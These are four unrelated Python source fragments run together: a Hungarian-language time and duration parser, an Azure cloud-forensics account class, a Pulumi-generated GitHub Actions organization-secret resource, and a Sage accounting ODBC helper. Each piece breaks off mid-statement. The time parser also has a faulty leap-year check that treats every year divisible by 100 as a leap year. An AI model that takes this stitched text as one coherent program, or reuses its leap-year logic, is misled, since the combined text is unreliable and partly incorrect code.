r'\b((?:ma\s?|holnap(?:\s?ut[aá]n)?\s?|tegnap(?:\s?el[oöő]t+)?\s?)?(?:reggel\s?|hajnal(?:i|ban)?\s?|d[eé]lel[oöő]t+\s?|d\.?e\.?\s?|d[eé]lut[aá]n\s?|d\.?u\.?\s?|este\s?|[eé]j+el\s?)?\,?\s?(?:[12345]?\d\s?perc+el\s)?(?:(?:h[aá]rom)?negyed\s?|f[eé]l\s?)?(?:[012]?\d|d[eé]l\w*|[eé]jf[eé]l\w*)\s?(?:\:\s?|k[oö]z[oö]t+|\-?kor\s?|\-?t[oóöő]l|\-?ig?|\-?r[ae]|[oó]r[aá]\w{0,3}\s?)?(?:el[oöő]t+\s?|ut[aá]n\s?)?(?:[0123456]?\d[\-\s]?(?![cmntvz][ae]l)(?:kor|t[oóöő]l|ig?|r[ae]|perc\w{0,3})?(?:\s?(?:(?:h[aá]rom)?negyed\s?|f[eé]l\s?)?([012]?\d(?:\sel[ooöő]t+|ut[aá]n)?))?)?\,?\s?(?:ma\s?|holnap(?:\s?ut[aá]n)?\s?|tegnap(?:\s?el[oöő]t+)?\s?)?(?:(1)(?:reggel\s?|hajnal(?:i|ban)?\s?|d[eé]lel[oöő]t+\s?|d\.?e\.?\s?|d[eé]lut[aá]n\s?|d\.?u\.?\s?|este\s?|[eé]j+el\s?))?)',
re.IGNORECASE, self._ntext_ if convert else self._text_)
results = []
if normalize:
last_pm = None
for _item in matches:
item = _item[0]
if len(item.strip()) > 2:
item = ' ' + item.lower() + ' '
hour = "00"
minute = "00"
pm = last_pm
zero = False
elott = False
del_matches = _re.findall(r'd[eé]l\w*|[eé]jf[eé]l\w*', re.IGNORECASE, item)
hour_matches = _re.findall(
r'\D([012]?\d(?!\d))\D*?(?!perc)(?:\:\s?|k[oö]z[oö]t+|\-?kor|\-?t[oóöő]l|\-?ig?|\-?r[ae]|[oó]r[aá]\w*)?',
re.IGNORECASE, item)
minute_matches = _re.findall(
r'(?!negyed|f[eé]l)\D([0123456]?\d(?!\d))\D*?(?![oó]r[aá])(?:\-?kor|\-?t[oóöő]l|\-?ig?|\-?r[ae]|perc\w*)?',
re.IGNORECASE, item)
quarter_matches = _re.findall(r'((?:h[aá]rom)?negyed|f[eé]l)', re.IGNORECASE, item)
am_matches = _re.findall(r'(reggel|hajnal|d[eé]lel[oöő]t|d\.?e\.?)', re.IGNORECASE, item)
pm_matches = _re.findall(r'(d[eé]lut[aá]n|d\.?u\.?|este|[eé]j+el)', re.IGNORECASE, item)
if len(hour_matches) in (1, 2):
if len(hour_matches) == 1:
if len(minute_matches) == 1:
hour = (hour_matches[0])
minute = "00"
elif len(minute_matches) == 2:
if (hour_matches[0]) == (minute_matches[0]):
hour = (hour_matches[0])
minute = (minute_matches[1])
else:
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
if len(minute_matches) == 2:
if (hour_matches[0]) == (minute_matches[1]):
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
hour = (hour_matches[0])
minute = (minute_matches[1])
elif len(minute_matches) == 1:
if (hour_matches[0]) == (minute_matches[0]):
hour = (hour_matches[1])
minute = "00"
else:
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
hour = (hour_matches[0])
if len(hour_matches) == 2:
minute = (hour_matches[1])
if hour[0] == '0':
zero = True
hour = int(hour)
minute = int(minute)
if hour > 24 and minute < 24:
minute, hour = hour, minute
if minute > 60:
minute = 0
if _re.findall(r'(el[oöő]t+)', re.IGNORECASE, item):
if minute:
if not _re.findall(r'(el[oöő]t+.+?perc)', re.IGNORECASE, item):
hour, minute = minute, hour
elott = True
hour -= 1
minute = 60 - minute
if _re.findall(r'(perccel.+?ut[aá]n+)', re.IGNORECASE, item):
hour, minute = minute, hour
hour = hour
if quarter_matches:
if quarter_matches[0] in ('fel', 'fél'):
if not elott:
hour -= 1
minute += 30
elif quarter_matches[0] in ('haromnegyed', 'háromnegyed'):
if not elott:
hour -= 1
minute += 45
elif quarter_matches[0] in ('negyed'):
if not elott:
hour -= 1
minute += 15
if not zero:
if pm_matches:
pm = True
elif not am_matches:
if current is not False:
now = current
else:
now = datetime.datetime.now().hour
if 'holnap' in item and hour < 9:
pm = True
elif hour < 12 and now > hour and last_pm is not False:
pm = True
else:
pm = False
if pm and hour <= 12:
hour += 12
hour %= 24
minute %= 60
last_pm = pm
results.append(str(hour).zfill(2) + ':' + str(minute).zfill(2))
elif del_matches:
if 'jf' in item:
results.append('00:00')
else:
results.append('12:00')
else:
for item in matches:
item = item[0].strip()
ok = False
for char in item:
if not char.isnumeric():
ok = True
if item and ok:
results.append(item)
return results
return []
# extract list of time durations
def durations(self, normalize=True, convert=True):
if self.text:
matches = _re.findall(
r'\b((?:(?:(?:\d\s?)+(?:[\.\,]\d+)?\s(?:(?:[eé]s\s)?(?:f[eé]l|(?:h[aá]rom)?negyed)\s)?(?:(?:(?:t[ií]zed|sz[aá]zad|ezred)?m[aá]sod)?perc\w{0,3}|[oó]r[aá]\w{0,3}|nap\w{0,3}|7\w{0,3}|h[eé]t\w{0,3}|h[oó]nap\w{0,3}|[eé]v\w{0,3})(?:\s(?:m[uú]lva|r[aá]|(?:ez)?el[oöő]t+|el[oöő]b+|k[eé]s[oö]b+|bel[uü]l|h[aá]tr(?:a|[eé]bb)|vissza|el[oöő]re))?)(?:\W{1,2}(?:[eé]s|meg)?\W*)?)+)',
re.IGNORECASE, self.ntext if convert else self.text)
if normalize:
results = []
now = datetime.datetime.now()
for item in matches:
sub_matches = _re.findall(
r'\b((?:(?:\d\s?)+(?:[\.\,]\d+)?\s(?:(?:[eé]s\s)?(?:f[eé]l|(?:h[aá]rom)?negyed)\s)?(?:(?:(?:t[ií]zed|sz[aá]zad|ezred)?m[aá]sod)?perc\w{0,3}|[oó]r[aá]\w{0,3}|nap\w{0,3}|7|h[eé]t\w{0,3}|h[oó]nap\w{0,3}|[eé]v\w{0,3})(?:\s(?:m[uú]lva|r[aá]|(?:ez)?el[oöő]t+|el[oöő]b+|k[eé]s[oö]b+|bel[uü]l|h[aá]tr(?:a|[eé]bb)|vissza|el[oöő]re))?))',
re.IGNORECASE, item)
val = 0
for sub_item in sub_matches:
match = sub_item.lower().replace(',', '.')
sval = ''
for char in match:
if char.isdigit() or char == '.':
sval += char
else:
break
sval = float(sval)
mpx = 1
if 'tized' in match or 'tízed' in match:
mpx = 0.1
elif 'szazad' in match or 'század' in match:
mpx = 0.01
elif 'ezred' in match:
mpx = 0.001
elif 'masod' in match or 'másod' in match:
mpx = 1
elif 'perc' in match:
mpx = 60
elif 'or' in match or 'ór' in match:
mpx = 3600
elif 'ho' in match or 'hó' in match:
if now.month in (1, 3, 5, 7, 8, 10, 12):
mpx = 86400 * 31
elif now.month == 2:
if now.year % 400 == 0 or now.year % 100 == 0 or now.year % 4 == 0:
mpx = 86400 * 29
else:
mpx = 86400 * 28
else:
mpx = 86400 * 30
elif 'nap' in match:
mpx = 86400
elif 'het' in match or 'hét' in match or '7' in match:
mpx = 604800
elif 'ev' in match or 'év' in match:
if now.year % 400 == 0 | |
<reponame>GreenStorm-Code/cloud-forensics-utils<filename>libcloudforensics/providers/azure/internal/account.py
# -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represents an Azure account."""
import base64
import hashlib
from time import sleep
from typing import Optional, Dict, Tuple, List, Any
# Pylint complains about the import but the library imports just fine,
# so we can ignore the warning.
# pylint: disable=import-error
import sshpubkeys
from azure.core import exceptions
from azure.mgmt import compute as azure_compute
from azure.mgmt import resource, storage, network
from azure.mgmt.compute.v2020_05_01 import models
from azure.storage import blob
from msrestazure import azure_exceptions
# pylint: enable=import-error
from libcloudforensics.providers.azure.internal import compute, common
from libcloudforensics import logging_utils
from libcloudforensics.scripts import utils
logging_utils.SetUpLogger(__name__)
logger = logging_utils.GetLogger(__name__)
class AZAccount:
"""Class that represents an Azure Account.
Attributes:
subscription_id (str): The Azure subscription ID to use.
credentials (ServicePrincipalCredentials): An Azure credentials object.
compute_client (ComputeManagementClient): An Azure compute client object.
"""
def __init__(self,
default_resource_group_name: str,
default_region: str = 'eastus',
profile_name: Optional[str] = None) -> None:
"""Initialize the AZAccount class.
Args:
default_resource_group_name (str): The default resource group in which to
create new resources in. If the resource group does not exists,
it will be automatically created.
default_region (str): Optional. The default region to create new
resources in. Default is eastus.
profile_name (str): Optional. The name of the profile to use for Azure
operations. For more information on profiles, see GetCredentials()
in libcloudforensics.providers.azure.internal.common.py. Default
does not use profiles and will authenticate to Azure using
environment variables.
"""
self.subscription_id, self.credentials = common.GetCredentials(profile_name)
self.default_region = default_region
self.compute_client = azure_compute.ComputeManagementClient(
self.credentials, self.subscription_id)
self.storage_client = storage.StorageManagementClient(
self.credentials, self.subscription_id)
self.resource_client = resource.ResourceManagementClient(
self.credentials, self.subscription_id)
self.network_client = network.NetworkManagementClient(
self.credentials, self.subscription_id)
self.default_resource_group_name = self._GetOrCreateResourceGroup(
default_resource_group_name)
def ListSubscriptionIDs(self) -> List[str]:
"""List subscription ids from an Azure account.
Returns:
List[str]: A list of all subscription IDs from the Azure account.
"""
subscription_client = resource.SubscriptionClient(self.credentials)
subscription_ids = subscription_client.subscriptions.list()
return [sub.subscription_id for sub in subscription_ids]
def ListInstances(self,
resource_group_name: Optional[str] = None
) -> Dict[str, compute.AZVirtualMachine]:
"""List instances in an Azure subscription / resource group.
Args:
resource_group_name (str): Optional. The resource group name to list
instances from. If none specified, then all instances in the Azure
subscription will be listed.
Returns:
Dict[str, AZVirtualMachine]: Dictionary mapping instance names (str) to
their respective AZVirtualMachine object.
"""
instances = {} # type: Dict[str, compute.AZVirtualMachine]
az_vm_client = self.compute_client.virtual_machines
if not resource_group_name:
responses = common.ExecuteRequest(az_vm_client, 'list_all')
else:
responses = common.ExecuteRequest(
az_vm_client,
'list',
{'resource_group_name': resource_group_name})
for response in responses:
for instance in response:
instances[instance.name] = compute.AZVirtualMachine(
self,
instance.id,
instance.name,
instance.location,
zones=instance.zones)
return instances
def ListDisks(
self,
resource_group_name: Optional[str] = None) -> Dict[str, compute.AZDisk]:
"""List disks in an Azure subscription / resource group.
Args:
resource_group_name (str): Optional. The resource group name to list
disks from. If none specified, then all disks in the AZ
subscription will be listed.
Returns:
Dict[str, AZDisk]: Dictionary mapping disk names (str) to their
respective AZDisk object.
"""
disks = {} # type: Dict[str, compute.AZDisk]
az_disk_client = self.compute_client.disks
if not resource_group_name:
responses = common.ExecuteRequest(az_disk_client, 'list')
else:
responses = common.ExecuteRequest(
az_disk_client,
'list_by_resource_group',
{'resource_group_name': resource_group_name})
for response in responses:
for disk in response:
disks[disk.name] = compute.AZDisk(self,
disk.id,
disk.name,
disk.location,
zones=disk.zones)
return disks
def GetInstance(
self,
instance_name: str,
resource_group_name: Optional[str] = None) -> compute.AZVirtualMachine:
"""Get instance from AZ subscription / resource group.
Args:
instance_name (str): The instance name.
resource_group_name (str): Optional. The resource group name to look
the instance in. If none specified, then the instance will be fetched
from the AZ subscription.
Returns:
AZVirtualMachine: An Azure virtual machine object.
Raises:
RuntimeError: If the instance was not found in the subscription / resource
group.
"""
instances = self.ListInstances(resource_group_name=resource_group_name)
if instance_name not in instances:
error_msg = 'Instance {0:s} was not found in subscription {1:s}'.format(
instance_name, self.subscription_id)
raise RuntimeError(error_msg)
return instances[instance_name]
def GetDisk(
self,
disk_name: str,
resource_group_name: Optional[str] = None) -> compute.AZDisk:
"""Get disk from AZ subscription / resource group.
Args:
disk_name (str): The disk name.
resource_group_name (str): Optional. The resource group name to look
the disk in. If none specified, then the disk will be fetched from
the AZ subscription.
Returns:
AZDisk: An Azure Compute Disk object.
Raises:
RuntimeError: If the disk was not found in the subscription / resource
group.
"""
disks = self.ListDisks(resource_group_name=resource_group_name)
if disk_name not in disks:
error_msg = 'Disk {0:s} was not found in subscription {1:s}'.format(
disk_name, self.subscription_id)
raise RuntimeError(error_msg)
return disks[disk_name]
def CreateDiskFromSnapshot(
self,
snapshot: compute.AZSnapshot,
region: Optional[str] = None,
disk_name: Optional[str] = None,
disk_name_prefix: Optional[str] = None,
disk_type: str = 'Standard_LRS') -> compute.AZDisk:
"""Create a new disk based on a Snapshot.
Args:
snapshot (AZSnapshot): Snapshot to use.
region (str): Optional. The region in which to create the disk. If not
provided, the disk will be created in the default_region associated to
the AZAccount object.
disk_name (str): Optional. String to use as new disk name.
disk_name_prefix (str): Optional. String to prefix the disk name with.
disk_type (str): Optional. The sku name for the disk to create. Can be
Standard_LRS, Premium_LRS, StandardSSD_LRS, or UltraSSD_LRS. The
default value is Standard_LRS.
Returns:
AZDisk: Azure Compute Disk.
Raises:
RuntimeError: If the disk could not be created.
"""
if not disk_name:
disk_name = common.GenerateDiskName(snapshot,
disk_name_prefix=disk_name_prefix)
if not region:
region = self.default_region
creation_data = {
'location': region,
'creation_data': {
'sourceResourceId': snapshot.resource_id,
'create_option': models.DiskCreateOption.copy
},
'sku': {'name': disk_type}
}
try:
logger.info('Creating disk: {0:s}'.format(disk_name))
request = self.compute_client.disks.create_or_update(
self.default_resource_group_name,
disk_name,
creation_data)
while not request.done():
sleep(5) # Wait 5 seconds before checking disk status again
disk = request.result()
logger.info('Disk {0:s} successfully created'.format(disk_name))
except azure_exceptions.CloudError as exception:
raise RuntimeError('Could not create disk from snapshot {0:s}: {1:s}'
.format(snapshot.resource_id, str(exception)))
return compute.AZDisk(self,
disk.id,
disk.name,
disk.location,
disk.zones)
def CreateDiskFromSnapshotURI(
self,
snapshot: compute.AZSnapshot,
snapshot_uri: str,
region: Optional[str] = None,
disk_name: Optional[str] = None,
disk_name_prefix: Optional[str] = None,
disk_type: str = 'Standard_LRS') -> compute.AZDisk:
"""Create a new disk based on a SAS snapshot URI.
This is useful if e.g. one wants to make a copy of a disk in a separate
Azure account. This method will create a temporary Azure Storage account
within the destination account, import the snapshot from a downloadable
link (the source account needs to share the snapshot through a SAS link)
and then create a disk from the VHD file saved in storage. The Azure
storage account is then deleted.
Args:
snapshot (AZSnapshot): Source snapshot to use.
snapshot_uri (str): The URI of the snapshot to copy.
region (str): Optional. The region in which to create the disk. If not
provided, the disk will be created in the default_region associated to
the AZAccount object.
disk_name (str): Optional. String to use as new disk name.
disk_name_prefix (str): Optional. String to prefix the disk name with.
disk_type (str): Optional. The sku name for the disk to create. Can be
Standard_LRS, Premium_LRS, StandardSSD_LRS, or UltraSSD_LRS.
Default is Standard_LRS.
Returns:
AZDisk: Azure Compute Disk.
Raises:
RuntimeError: If the disk could not be created.
"""
if not region:
region = self.default_region
# Create a temporary Azure account storage to import the snapshot
storage_account_name = hashlib.sha1(
snapshot.resource_id.encode('utf-8')).hexdigest()[:23]
storage_account_url = 'https://{0:s}.blob.core.windows.net'.format(
storage_account_name)
storage_account_id, storage_account_access_key = self._CreateStorageAccount(
storage_account_name, region=region)
blob_service_client = blob.BlobServiceClient(
account_url=storage_account_url, credential=storage_account_access_key)
# Create a container within the Storage to receive the imported snapshot
container_name = storage_account_name + '-container'
snapshot_vhd_name = snapshot.name + '.vhd'
container_client = blob_service_client.get_container_client(container_name)
try:
logger.info('Creating blob container {0:s}'.format(container_name))
container_client.create_container()
logger.info('Blob container {0:s} successfully created'.format(
container_name))
except exceptions.ResourceExistsError:
# The container already exists, so we can re-use it
logger.warning('Reusing existing container: {0:s}'.format(container_name))
# Download the snapshot from the URI to the storage
copied_blob = blob_service_client.get_blob_client(
container_name, snapshot_vhd_name)
logger.info('Importing snapshot to container from URI {0:s}. '
'Depending on the size of the snapshot, this process is going '
'to take a while.'.format(snapshot_uri))
copied_blob.start_copy_from_url(snapshot_uri)
copy_status = copied_blob.get_blob_properties().copy.status
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ActionsOrganizationSecretArgs', 'ActionsOrganizationSecret']
@pulumi.input_type
class ActionsOrganizationSecretArgs:
def __init__(__self__, *,
secret_name: pulumi.Input[str],
visibility: pulumi.Input[str],
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
"""
The set of arguments for constructing a ActionsOrganizationSecret resource.
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
"""
pulumi.set(__self__, "secret_name", secret_name)
pulumi.set(__self__, "visibility", visibility)
if encrypted_value is not None:
pulumi.set(__self__, "encrypted_value", encrypted_value)
if plaintext_value is not None:
pulumi.set(__self__, "plaintext_value", plaintext_value)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> pulumi.Input[str]:
"""
Name of the secret
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter
def visibility(self) -> pulumi.Input[str]:
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: pulumi.Input[str]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> Optional[pulumi.Input[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@encrypted_value.setter
def encrypted_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_value", value)
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> Optional[pulumi.Input[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@plaintext_value.setter
def plaintext_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plaintext_value", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
An array of repository ids that can access the organization secret.
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@pulumi.input_type
class _ActionsOrganizationSecretState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
updated_at: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ActionsOrganizationSecret resources.
:param pulumi.Input[str] created_at: Date of actions_secret creation.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
:param pulumi.Input[str] updated_at: Date of actions_secret update.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if encrypted_value is not None:
pulumi.set(__self__, "encrypted_value", encrypted_value)
if plaintext_value is not None:
pulumi.set(__self__, "plaintext_value", plaintext_value)
if secret_name is not None:
pulumi.set(__self__, "secret_name", secret_name)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
if updated_at is not None:
pulumi.set(__self__, "updated_at", updated_at)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
Date of actions_secret creation.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> Optional[pulumi.Input[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@encrypted_value.setter
def encrypted_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_value", value)
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> Optional[pulumi.Input[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@plaintext_value.setter
def plaintext_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plaintext_value", value)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the secret
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
An array of repository ids that can access the organization secret.
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@property
@pulumi.getter(name="updatedAt")
def updated_at(self) -> Optional[pulumi.Input[str]]:
"""
Date of actions_secret update.
"""
return pulumi.get(self, "updated_at")
@updated_at.setter
def updated_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "updated_at", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class ActionsOrganizationSecret(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Import
This resource can be imported using an ID made up of the secret name
```sh
$ pulumi import github:index/actionsOrganizationSecret:ActionsOrganizationSecret test_secret test_secret_name
```
NOTEthe implementation is limited in that it won't fetch the value of the `plaintext_value` or `encrypted_value` fields when importing. You may need to ignore changes for these as a workaround.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionsOrganizationSecretArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
This resource can be imported using an ID made up of the secret name
```sh
$ pulumi import github:index/actionsOrganizationSecret:ActionsOrganizationSecret test_secret test_secret_name
```
NOTEthe implementation is limited in that it won't fetch the value of the `plaintext_value` or `encrypted_value` fields when importing. You may need to ignore changes for these as a workaround.
:param str resource_name: The name of the resource.
:param ActionsOrganizationSecretArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionsOrganizationSecretArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionsOrganizationSecretArgs.__new__(ActionsOrganizationSecretArgs)
__props__.__dict__["encrypted_value"] = encrypted_value
__props__.__dict__["plaintext_value"] = plaintext_value
if secret_name is None and not opts.urn:
raise TypeError("Missing required property 'secret_name'")
__props__.__dict__["secret_name"] = secret_name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
if visibility is None and not opts.urn:
raise TypeError("Missing required property 'visibility'")
__props__.__dict__["visibility"] = visibility
__props__.__dict__["created_at"] = None
__props__.__dict__["updated_at"] = None
super(ActionsOrganizationSecret, __self__).__init__(
'github:index/actionsOrganizationSecret:ActionsOrganizationSecret',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
created_at: Optional[pulumi.Input[str]] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
updated_at: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'ActionsOrganizationSecret':
"""
Get an existing ActionsOrganizationSecret resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: Date of actions_secret creation.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
:param pulumi.Input[str] updated_at: Date of actions_secret update.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionsOrganizationSecretState.__new__(_ActionsOrganizationSecretState)
__props__.__dict__["created_at"] = created_at
__props__.__dict__["encrypted_value"] = encrypted_value
__props__.__dict__["plaintext_value"] = plaintext_value
__props__.__dict__["secret_name"] = secret_name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
__props__.__dict__["updated_at"] = updated_at
__props__.__dict__["visibility"] = visibility
return ActionsOrganizationSecret(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
Date of actions_secret creation.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> pulumi.Output[Optional[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> pulumi.Output[Optional[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> | |
"""Interface to Sage accounting ODBC
This provides an interface to extract data from the accounting system.
It works by extracting the data into a Pandas dataframe and then doing queries from that.
"""
import json
import numpy as np
import pandas as pd
import pyodbc
import os
from dotenv import load_dotenv, find_dotenv
from luca import p
class PySageError(Exception):
pass
def get_default_connection_string():
# Make sure environment variables loaded.
try:
try:
# Python 2
connection_string = os.environ['PYSAGE_CNXN'].decode('utf8')
except AttributeError:
# Python 3
connection_string = os.environ['PYSAGE_CNXN']
except KeyError:
raise PySageError('Environment missing PYSAGE_CNXN setting. '
+ 'Check for .env file looked here ??')
return connection_string
def get_max_transaction_in_sage(cnxn):
sql = """
SELECT
max(TRAN_NUMBER)
FROM
AUDIT_JOURNAL
"""
df = pd.read_sql(sql, cnxn)
return int(df.iloc[0,0])
def check_cache_upto_date():
"""This looks at the highest transaction and sees if a newer one is in the database. It is not perfect
as only checks the transactions and donesn't notice if a file has been edited wihtout adding new transactions.
"""
connection_string = get_default_connection_string()
cnxn = pyodbc.connect(connection_string)
# Get the maximum transaction number
json_check_file_name = 'SageODBC_check.json'
# Read it from file
try:
with open(json_check_file_name) as f:
data = json.load(f)
max_transaction_stored = data['max_transaction_stored']
except (FileNotFoundError, ValueError): # Triggered as open nonexistent file is ok but no data
max_transaction_stored = 0
max_transaction_in_sage = get_max_transaction_in_sage(cnxn)
# Update file
data = {'max_transaction_stored': max_transaction_in_sage}
with open(json_check_file_name, 'w') as f:
json.dump(data, f)
update_cache = (max_transaction_stored == 0) or max_transaction_stored != max_transaction_in_sage
return update_cache
def get_dataframe_sage_odbc_query(sql, name, cache_upto_date):
"""This executes a SQL query if it needs to or pulls in a json file from disk.
The results of the SQL query are returned as a dataframe. To decide which to do
